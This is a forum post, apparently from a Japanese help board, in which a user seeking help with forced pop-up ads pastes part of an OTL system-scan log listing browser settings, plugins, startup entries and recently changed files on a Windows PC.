IE - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com
IE - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IE8SRC
IE - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001\..\SearchScopes\{502856A1-6DE0-41A4-B5E0-C086F87A22D4}: "URL" = http://www.bing.com/search?FORM=UP97DF&PC=UP97&q={searchTerms}&src=IE-SearchBox
IE - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0

[color=#E56717]========== FireFox ==========[/color]

FF - prefs.js..browser.search.countryCode: "JP"
FF - prefs.js..browser.search.region: "JP"
FF - prefs.js..extensions.enabledAddons: %7B972ce4c6-7e08-4474-a285-3208198ce6fd%7D:37.0.1
FF - user.js - File not found

FF:[b]64bit:[/b] - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\WINDOWS\system32\Macromed\Flash\NPSWF64_17_0_0_169.dll File not found
FF:[b]64bit:[/b] - HKLM\Software\MozillaPlugins\@divx.com/DivX VOD Helper,version=1.0.0: C:\Program Files\DivX\DivX OVS Helper\npovshelper.dll (DivX, LLC.)
FF - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_17_0_0_169.dll ()
FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=: File not found
FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=1.0: C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF - HKLM\Software\MozillaPlugins\@divx.com/DivX VOD Helper,version=1.0.0: C:\Program Files (x86)\DivX\DivX OVS Helper\npovshelper.dll (DivX, LLC.)
FF - HKLM\Software\MozillaPlugins\@gamepot.co.jp/GamepotEXeEnvCtrl;version=1: C:\Program Files (x86)\Gamepot\GPEXE\\npGPEXE.dll ()
FF - HKLM\Software\MozillaPlugins\@intel-webapi.intel.com/Intel WebAPI ipt;version=2.1.42: C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll (Intel Corporation)
FF - HKLM\Software\MozillaPlugins\@intel-webapi.intel.com/Intel WebAPI updater: C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll (Intel Corporation)
FF - HKLM\Software\MozillaPlugins\@nexon.co.jp/NxGame: C:\ProgramData\NexonJP\NGM\npNxGameJP.dll (Nexon)
FF - HKLM\Software\MozillaPlugins\@pandonetworks.com/PandoWebPlugin: C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll File not found
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=3: C:\Program Files (x86)\Google\Update\1.3.22.3\npGoogleUpdate3.dll (Google Inc.)
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=9: C:\Program Files (x86)\Google\Update\1.3.22.3\npGoogleUpdate3.dll (Google Inc.)
FF - HKLM\Software\MozillaPlugins\Adobe Reader: C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF - HKLM\Software\MozillaPlugins\pmang.jp/pmangsupport-1: C:\Users\ryota\Desktop\新しいフォルダー\GameOn\TERA\nppmangsupport_0.dll (gameon)
FF - HKCU\Software\MozillaPlugins\@neople.co.kr/NeopleGameInstaller: C:\ProgramData\NeoplePlugin\npNeopleGameInstaller.dll ( )

FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 37.0.1\extensions\\Components: c:\program files (x86)\Mozilla Firefox\components [2014/08/30 11:40:53 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 37.0.1\extensions\\Plugins: c:\program files (x86)\Mozilla Firefox\plugins

[2014/05/16 21:28:33 | 000,000,000 | ---D | M] (No name found) -- C:\Users\ryota\AppData\Roaming\mozilla\Extensions
[2015/04/04 19:27:38 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files (x86)\Mozilla Firefox\browser\extensions
[2015/04/04 19:25:26 | 000,000,000 | ---D | M] (Default) -- C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}

[color=#E56717]========== Chrome ==========[/color]

CHR - default_search_provider: Google (Enabled)
CHR - default_search_provider: search_url = {google:baseURL}search?q={searchTerms}&{google:RLZ}{google:originalQueryForSuggestion}{google:assistedQueryStats}{google:searchFieldtrialParameter}{google:bookmarkBarPinned}{google:searchClient}{google:sourceId}{google:instantExtendedEnabledParameter}{google:omniboxStartMarginParameter}ie={inputEncoding}
CHR - default_search_provider: suggest_url = {google:baseSuggestURL}search?{google:searchFieldtrialParameter}client={google:suggestClient}&gs_ri={google:suggestRid}&xssi=t&q={searchTerms}&{google:cursorPosition}{google:currentPageUrl}{google:pageClassification}sugkey={google:suggestAPIKeyParameter},
CHR - homepage:
CHR - plugin: Error reading preferences file
CHR - Extension: Google 繝峨く繝・繝。繝ウ繝・ = C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\
CHR - Extension: Google 繝峨Λ繧、繝・ = C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.4_0\
CHR - Extension: YouTube = C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.7_0\
CHR - Extension: Google Search = C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.30_0\
CHR - Extension: Avira Browser Safety = C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Extensions\flliilndjeohchalpbbcdekjklbdgfkk\1.4.6_0\
CHR - Extension: Google 繧ヲ繧ゥ繝ャ繝・ヨ = C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.6.1_0\
CHR - Extension: Gmail = C:\Users\ryota\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.1_0\
  • かなは
  • 2015/04/23 (Thu) 12:00:34
Re: I'm having trouble with pop-ups and ads being forcibly displayed.
This is the continuation of the OTL log.


O1 HOSTS File: ([2015/04/21 22:18:53 | 000,000,098 | ---- | M]) - C:\Windows\SysNative\drivers\etc\Hosts
O1 - Hosts: 127.0.0.1 localhost
O1 - Hosts: ::1 localhost
O2:[b]64bit:[/b] - BHO: (Skype Click to Call for Internet Explorer) - {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\SkypeIEPlugin.dll (Microsoft Corporation)
O2 - BHO: (Skype Click to Call for Internet Explorer) - {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll (Microsoft Corporation)
O3 - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001\..\Toolbar\WebBrowser: (no name) - {AEF44653-C059-42CB-A5B7-41C640DA4A67} - No CLSID value found.
O4:[b]64bit:[/b] - HKLM..\Run: [Creative SB Monitoring Utility] C:\WINDOWS\SysNative\SBAVMon.dll (Creative Technology Ltd.)
O4:[b]64bit:[/b] - HKLM..\Run: [IgfxTray] C:\Windows\SysNative\igfxTray.exe (Intel Corporation)
O4 - HKLM..\Run: [APSDaemon] C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe (Apple Inc.)
O4 - HKLM..\Run: [au_WiFi_Connect] C:\Program Files (x86)\au Wi-Fi接続ツール\au_WiFi_Connect.exe ()
O4 - HKLM..\Run: [DivXUpdate] C:\Program Files (x86)\DivX\DivX Update\DivXUpdate.exe ()
O4 - HKLM..\Run: [eochk] File not found
O4 - HKLM..\Run: [Google Japanese Input Prelauncher] C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaBroker32.exe (Google Inc.)
O4 - HKLM..\Run: [HDAudDeck] C:\Program Files (x86)\VIA\VIAudioi\VDeck\VDeck.exe (VIA)
O4 - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001..\Run: [ApplicationManager] C:\Users\ryota\AppData\Roaming\ApplicationManager\bin\ApplicationManager.exe (Kingsoft Corp. Ltd.)
O4 - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001..\Run: [CCleaner Monitoring] C:\Program Files\CCleaner\CCleaner64.exe (Piriform Ltd)
O4 - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001..\Run: [iFunBox Fast App Install Handler] C:\Program Files (x86)\i-Funbox DevTeam\iFunBox.exe (i-Funbox.com)
O4 - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001..\Run: [Line] C:\Program Files (x86)\Naver\LINE\Line.exe (LINE Corporation)
O4 - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001..\Run: [OneDrive] C:\Users\ryota\AppData\Local\Microsoft\OneDrive\OneDrive.exe (Microsoft Corporation)
O4 - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001..\RunOnce: [Application Restart #0] C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.)
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktopChanges = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktop = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: EnableCursorSuppression = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorUser = 3
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorAdmin = 0
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: PromptOnSecureDesktop = 0
O9:[b]64bit:[/b] - Extra Button: Skype Click to Call settings - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\SkypeIEPlugin.dll (Microsoft Corporation)
O9 - Extra Button: Skype Click to Call settings - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll (Microsoft Corporation)
O13[b]64bit:[/b] - gopher Prefix: missing
O13 - gopher Prefix: missing
O16 - DPF: {1DC420F0-D89A-40D0-B5CC-92B9AD19A1AC} http://down.hangame.co.jp/jp/dist/hgstart/HGPluginJP28.cab (HGPluginJP28 Class)
O16 - DPF: {255A2E53-D2E3-42DA-9C1D-36B289B8E18B} http://dl.app-netgame.dmm.com/launcher/DMMLauncherAx_32.cab (DMMLauncherAx Control)
O16 - DPF: {5082D9B5-5538-4C50-BDB1-C5F44BFB98CC} http://down.hangame.co.jp/jp/installer/HgRunPub.cab (HgRunPub Class)
O16 - DPF: {AA07EBD2-EBDD-4BD6-9F8F-114BD513492C} http://dist.cdnetworks.co.jp/cdndist/neffy/NeffyLauncher.cab (NeffyLauncherCtl Class)
O16 - DPF: {D4B68B83-8710-488B-A692-D74B50BA558E} http://ccfiles.creative.com/Web/softwareupdate/ocx/15113/CTPIDPDE.cab (Creative Software AutoUpdate Support Package 2)
O16 - DPF: {E705A591-DA3C-4228-B0D5-A356DBA42FBF} http://ccfiles.creative.com/Web/softwareupdate/su2/ocx/20015/CTSUEng.cab (Creative Software AutoUpdate 2)
O16 - DPF: {F6ACF75C-C32C-447B-9BEF-46B766368D29} http://ccfiles.creative.com/Web/softwareupdate/ocx/121022/CTPID.cab (Creative Software AutoUpdate Support Package)
O16 - DPF: {F8160836-0C11-4CA4-AD87-944542C7BCBD} http://down.hangame.co.jp/jp/purple/launcher/PubPlugin.cab (PubPlugin Class)
O18:[b]64bit:[/b] - Protocol\Handler\skype4com - No CLSID value found
O18:[b]64bit:[/b] - Protocol\Handler\skypec2c {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\SkypeIEPlugin.dll (Microsoft Corporation)
O18 - Protocol\Handler\skype4com {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll (Skype Technologies)
O18 - Protocol\Handler\skypec2c {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll (Microsoft Corporation)
O20:[b]64bit:[/b] - HKLM Winlogon: Shell - (explorer.exe) - C:\WINDOWS\explorer.exe (Microsoft Corporation)
O20:[b]64bit:[/b] - HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\Windows\SysNative\userinit.exe (Microsoft Corporation)
O20 - HKLM Winlogon: Shell - (explorer.exe) - C:\WINDOWS\SysWow64\explorer.exe (Microsoft Corporation)
O20 - HKLM Winlogon: UserInit - (userinit.exe) - C:\WINDOWS\SysWow64\userinit.exe (Microsoft Corporation)
O21:[b]64bit:[/b] - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.
O21 - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.
O30 - LSA: Security Packages - (livessp) - File not found
O32 - HKLM CDRom: AutoRun - 1
O33 - MountPoints2\{2284b339-6b2b-11e4-824f-fed426b625ef}\Shell - "" = AutoRun
O33 - MountPoints2\{2284b339-6b2b-11e4-824f-fed426b625ef}\Shell\AutoRun\command - "" = "F:\install.exe"
O34 - HKLM BootExecute: (autocheck autochk *)
O35:[b]64bit:[/b] - HKLM\..comfile [open] -- "%1" %*
O35:[b]64bit:[/b] - HKLM\..exefile [open] -- "%1" %*
O35 - HKLM\..comfile [open] -- "%1" %*
O35 - HKLM\..exefile [open] -- "%1" %*
O37:[b]64bit:[/b] - HKLM\...com [@ = comfile] -- "%1" %*
O37:[b]64bit:[/b] - HKLM\...exe [@ = exefile] -- "%1" %*
O37 - HKLM\...com [@ = comfile] -- "%1" %*
O37 - HKLM\...exe [@ = exefile] -- "%1" %*
O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3)
O38 - SubSystems\\Windows: (ServerDll=sxssrv,4)

CREATERESTOREPOINT
Unable to start System Restore Service. Error code 1084

[color=#E56717]========== Files/Folders - Created Within 30 Days ==========[/color]

[2015/04/21 22:18:46 | 000,000,000 | ---D | C] -- C:\_OTL
[2015/04/21 20:06:50 | 000,000,000 | ---D | C] -- C:\Users\ryota\Desktop\Old Firefox Data
[2015/04/20 21:58:26 | 000,000,000 | ---D | C] -- C:\Program Files\Reason
[2015/04/20 21:57:24 | 000,602,112 | ---- | C] (OldTimer Tools) -- C:\Users\ryota\Desktop\OTL.exe
[2015/04/20 21:53:24 | 002,873,112 | ---- | C] (Reason Company Software Inc.) -- C:\Users\ryota\Desktop\herdProtectScan_Setup.exe
[2015/04/18 19:28:00 | 000,792,056 | ---- | C] (Adobe Systems Incorporated) -- C:\WINDOWS\SysWow64\FlashPlayerApp.exe
[2015/04/18 19:28:00 | 000,178,168 | ---- | C] (Adobe Systems Incorporated) -- C:\WINDOWS\SysWow64\FlashPlayerCPLApp.cpl
[2015/04/18 19:22:07 | 000,000,000 | ---D | C] -- C:\WINDOWS\SysNative\appraiser
[2015/04/16 05:26:09 | 000,085,504 | ---- | C] (Radius Inc.) -- C:\WINDOWS\SysWow64\iccvid.dll
[2015/04/15 04:37:56 | 007,476,032 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\ntoskrnl.exe
[2015/04/15 04:37:56 | 001,733,952 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\ntdll.dll
[2015/04/15 04:37:55 | 000,950,784 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\tdh.dll
[2015/04/15 04:37:55 | 000,749,568 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysWow64\tdh.dll
[2015/04/15 04:37:55 | 000,411,648 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\tracerpt.exe
[2015/04/15 04:37:55 | 000,369,152 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysWow64\tracerpt.exe
[2015/04/15 04:37:55 | 000,360,480 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\sechost.dll
[2015/04/15 04:37:55 | 000,285,184 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\wow64.dll
[2015/04/15 04:37:55 | 000,246,272 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\microsoft-windows-system-events.dll
[2015/04/15 04:37:55 | 000,013,312 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\wow64cpu.dll
[2015/04/15 04:37:48 | 001,385,256 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\msctf.dll
[2015/04/15 04:37:47 | 000,780,800 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\lsm.dll
[2015/04/15 04:37:42 | 006,025,216 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\jscript9.dll
[2015/04/15 04:37:41 | 000,720,384 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\ie4uinit.exe
[2015/04/15 04:37:40 | 000,092,160 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\mshtmled.dll
[2015/04/15 04:37:39 | 000,816,128 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\jscript.dll
[2015/04/15 04:37:39 | 000,801,280 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\msfeeds.dll
[2015/04/15 04:37:39 | 000,664,064 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysWow64\jscript.dll
[2015/04/15 04:37:39 | 000,584,192 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\vbscript.dll
[2015/04/15 04:37:38 | 000,800,768 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\ieapfltr.dll
[2015/04/15 04:37:38 | 000,710,144 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysWow64\ieapfltr.dll
[2015/04/15 04:36:49 | 002,373,632 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\wucltux.dll
[2015/04/15 04:36:49 | 000,133,256 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\wuauclt.exe
[2015/04/15 04:36:48 | 000,891,392 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\wuapi.dll
[2015/04/15 04:36:48 | 000,721,920 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysWow64\wuapi.dll
[2015/04/15 04:36:48 | 000,408,064 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\WUSettingsProvider.dll
[2015/04/15 04:36:48 | 000,267,264 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\WinSetupUI.dll
[2015/04/15 04:36:48 | 000,200,192 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\storewuauth.dll
[2015/04/15 04:36:48 | 000,066,048 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\wups.dll
[2015/04/15 04:36:48 | 000,052,224 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\wups2.dll
[2015/04/15 04:36:48 | 000,015,360 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\wu.upgrade.ps.dll
[2015/04/15 04:36:47 | 000,140,288 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\wuwebv.dll
[2015/04/15 04:36:47 | 000,124,928 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysWow64\wuwebv.dll
[2015/04/15 04:36:47 | 000,095,744 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\wudriver.dll
[2015/04/15 04:36:47 | 000,081,920 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysWow64\wudriver.dll
[2015/04/15 04:36:47 | 000,035,840 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\wuapp.exe
[2015/04/15 04:36:47 | 000,029,696 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysWow64\wuapp.exe
[2015/04/15 04:36:47 | 000,027,136 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysWow64\wups.dll
[2015/04/15 04:36:31 | 000,377,152 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\drivers\clfs.sys
[2015/04/15 04:36:31 | 000,075,264 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\clfsw32.dll
[2015/04/15 04:36:31 | 000,058,880 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysWow64\clfsw32.dll
[2015/04/15 04:36:29 | 001,111,552 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\aeinv.dll
[2015/04/15 04:36:29 | 000,957,440 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\appraiser.dll
[2015/04/15 04:36:29 | 000,769,024 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\invagent.dll
[2015/04/15 04:36:29 | 000,726,528 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\generaltel.dll
[2015/04/15 04:36:29 | 000,419,328 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\devinv.dll
[2015/04/15 04:36:29 | 000,227,328 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\aepdu.dll
[2015/04/15 04:36:29 | 000,192,000 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\aepic.dll
[2015/04/15 04:36:29 | 000,030,720 | ---- | C] (Microsoft Corporation) -- C:\WINDOWS\SysNative\acmigration.dll
[2015/04/12 01:37:12 | 000,000,000 | ---D | C] -- C:\Users\ryota\AppData\Local\Apple Computer
[2015/04/10 17:53:01 | 000,000,000 | ---D | C] -- C:\Users\ryota\AppData\Local\Apple
[2015/04/04 21:24:54 | 000,000,000 | ---D | C] -- C:\Users\ryota\AppData\Roaming\Malwarebytes
[2015/04/04 21:24:37 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes' Anti-Malware
[2015/04/04 21:24:37 | 000,000,000 | ---D | C] -- C:\ProgramData\Malwarebytes
[2015/04/04 21:24:36 | 000,025,928 | ---- | C] (Malwarebytes Corporation) -- C:\WINDOWS\SysNative\drivers\mbam.sys
[2015/04/04 21:24:36 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Malwarebytes' Anti-Malware
[2015/04/04 19:35:46 | 000,000,000 | ---D | C] -- C:\Users\ryota\AppData\Local\Adobe
[2015/04/04 19:27:38 | 000,000,000 | ---D | C] -- C:\Users\ryota\Tracing
[2015/04/04 18:34:25 | 000,000,000 | --SD | C] -- C:\WINDOWS\SysWow64\GWX
[2015/04/04 18:34:25 | 000,000,000 | --SD | C] -- C:\WINDOWS\SysNative\GWX
[2015/04/04 18:11:11 | 000,000,000 | ---D | C] -- C:\Users\ryota\Desktop\Mario Story (J) [!]
[2015/04/04 17:31:07 | 000,000,000 | ---D | C] -- C:\Users\ryota\AppData\Roaming\Geek Uninstaller
[2015/04/04 16:36:25 | 000,000,000 | ---D | C] -- C:\Users\ryota\Desktop\geek
[2015/04/04 16:33:36 | 000,050,688 | ---- | C] (Atribune.org) -- C:\Users\ryota\Desktop\ATF-Cleaner (1).exe
[2015/02/02 23:25:12 | 000,782,480 | ---- | C] (Neople inc) -- C:\Users\ryota\AppData\Local\AradIns.exe
[2015/02/02 23:24:38 | 000,584,336 | ---- | C] (Neople inc) -- C:\Users\ryota\AppData\Local\NeopleCustomURLStarter.exe

[color=#E56717]========== Files - Modified Within 30 Days ==========[/color]

[2015/04/22 23:54:11 | 000,067,584 | --S- | M] () -- C:\WINDOWS\bootstat.dat
[2015/04/22 23:52:08 | 268,435,456 | -HS- | M] () -- C:\swapfile.sys
[2015/04/22 23:52:05 | 2474,680,319 | -HS- | M] () -- C:\hiberfil.sys
[2015/04/22 23:48:00 | 000,000,626 | ---- | M] () -- C:\WINDOWS\tasks\Adobe Flash Player Updater.job
[2015/04/22 23:42:14 | 000,002,196 | ---- | M] () -- C:\Users\Public\Desktop\Google Chrome.lnk
[2015/04/22 23:42:12 | 000,000,702 | ---- | M] () -- C:\WINDOWS\tasks\GoogleUpdateTaskMachineCore.job
[2015/04/22 22:59:00 | 000,000,706 | ---- | M] () -- C:\WINDOWS\tasks\GoogleUpdateTaskMachineUA.job
[2015/04/22 22:53:41 | 000,000,020 | ---- | M] () -- C:\Users\ryota\AppData\Roaming\appdataFr3.bin
[2015/04/22 00:26:27 | 000,058,581 | ---- | M] () -- C:\Users\ryota\Desktop\BmJbrLdtf0pZaED1429629961_1429629979.jpg
[2015/04/21 22:18:53 | 000,000,098 | ---- | M] () -- C:\WINDOWS\SysNative\drivers\etc\Hosts
[2015/04/20 21:57:26 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\ryota\Desktop\OTL.exe
[2015/04/20 21:54:14 | 002,873,112 | ---- | M] (Reason Company Software Inc.) -- C:\Users\ryota\Desktop\herdProtectScan_Setup.exe
[2015/04/18 19:31:33 | 001,496,524 | ---- | M] () -- C:\WINDOWS\SysNative\PerfStringBackup.INI
[2015/04/18 19:31:33 | 000,722,278 | ---- | M] () -- C:\WINDOWS\SysNative\perfh009.dat
[2015/04/18 19:31:33 | 000,499,650 | ---- | M] () -- C:\WINDOWS\SysNative\perfh011.dat
[2015/04/18 19:31:33 | 000,135,458 | ---- | M] () -- C:\WINDOWS\SysNative\perfc011.dat
[2015/04/18 19:31:33 | 000,135,394 | ---- | M] () -- C:\WINDOWS\SysNative\perfc009.dat
[2015/04/16 05:31:51 | 000,215,552 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\SysNative\msclmd.dll
[2015/04/16 05:31:51 | 000,195,072 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\SysWow64\msclmd.dll
[2015/04/14 08:24:21 | 000,792,056 | ---- | M] (Adobe Systems Incorporated) -- C:\WINDOWS\SysWow64\FlashPlayerApp.exe
[2015/04/14 08:24:21 | 000,178,168 | ---- | M] (Adobe Systems Incorporated) -- C:\WINDOWS\SysWow64\FlashPlayerCPLApp.cpl
[2015/04/04 21:39:57 | 000,001,132 | ---- | M] () -- C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
[2015/04/04 19:51:47 | 000,001,098 | ---- | M] () -- C:\Users\ryota\Application Data\Microsoft\Internet Explorer\Quick Launch\WorldofTanks.lnk
[2015/04/04 19:25:29 | 000,001,170 | ---- | M] () -- C:\Users\Public\Desktop\Mozilla Firefox.lnk
[2015/04/04 16:38:09 | 000,000,841 | ---- | M] () -- C:\Users\Public\Desktop\CCleaner.lnk
[2015/04/04 16:33:39 | 000,050,688 | ---- | M] (Atribune.org) -- C:\Users\ryota\Desktop\ATF-Cleaner (1).exe
[2015/03/24 06:59:25 | 001,733,952 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\SysNative\ntdll.dll
[2015/03/24 06:59:25 | 000,360,480 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\SysNative\sechost.dll
[2015/03/24 06:59:00 | 007,476,032 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\SysNative\ntoskrnl.exe

[color=#E56717]========== Files Created - No Company Name ==========[/color]

[2015/04/22 00:26:26 | 000,058,581 | ---- | C] () -- C:\Users\ryota\Desktop\BmJbrLdtf0pZaED1429629961_1429629979.jpg
[2015/04/15 04:37:38 | 000,016,303 | ---- | C] () -- C:\WINDOWS\SysWow64\ieuinit.inf
[2015/04/15 04:37:38 | 000,016,303 | ---- | C] () -- C:\WINDOWS\SysNative\ieuinit.inf
[2015/04/04 21:24:37 | 000,001,132 | ---- | C] () -- C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
[2015/03/15 00:01:07 | 000,107,008 | ---- | C] () -- C:\WINDOWS\SysWow64\OEMLicense.dll
[2015/03/14 23:59:54 | 000,046,080 | ---- | C] () -- C:\WINDOWS\SysWow64\BWContextHandler.dll
[2015/03/02 14:09:57 | 000,000,020 | ---- | C] () -- C:\Users\ryota\AppData\Roaming\appdataFr3.bin
[2014/11/19 17:11:37 | 000,000,242 | RHS- | C] () -- C:\ProgramData\ntuser.pol
[2014/10/01 19:54:10 | 000,183,808 | ---- | C] () -- C:\WINDOWS\SysWow64\igdde32.dll
[2014/10/01 19:54:10 | 000,143,360 | ---- | C] () -- C:\WINDOWS\SysWow64\igdail32.dll
[2014/09/24 15:58:21 | 000,002,255 | ---- | C] () -- C:\WINDOWS\SysWow64\WimBootCompress.ini
[2014/02/15 00:25:26 | 000,645,632 | ---- | C] () -- C:\WINDOWS\SysWow64\xvidcore.dll
[2014/02/15 00:25:26 | 000,240,640 | ---- | C] () -- C:\WINDOWS\SysWow64\xvidvfw.dll
[2014/02/15 00:25:25 | 000,079,360 | ---- | C] () -- C:\WINDOWS\SysWow64\ff_vfw.dll
